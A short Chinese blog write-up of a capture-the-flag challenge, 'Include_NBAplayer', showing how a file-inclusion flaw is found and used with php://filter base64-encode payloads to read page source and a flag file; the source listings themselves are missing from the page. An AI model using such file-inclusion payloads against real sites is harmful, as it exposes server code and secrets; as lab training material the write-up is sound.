Include_NBAplayer
信息收集
查看源码
这里可能存在文件包含
测试
随便选一个
伪协议,查看当前页面php://filter/read=convert.base64-encode/resource=include/file1.php
得到源码
1 |
|
可以看到它将一张图片和一段话赋值给了 $html
并输出(index.php
中有写,伪协议也可以读取)
我们发现图片一共有 5 张,对应五个文件,我们试试读取第六个文件(可能存在)php://filter/read=convert.base64-encode/resource=include/file6.php
得到
1 |
|
php://filter/read=convert.base64-encode/resource=include/flag.php
1 |
|
- 标题: Include_NBAplayer
- 作者: Itachi
- 创建于 : 2022-01-12 17:23:06
- 更新于 : 2022-01-12 20:01:30
- 链接: https://blog.tarchi.top/ctf/Include-NBAplayer/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论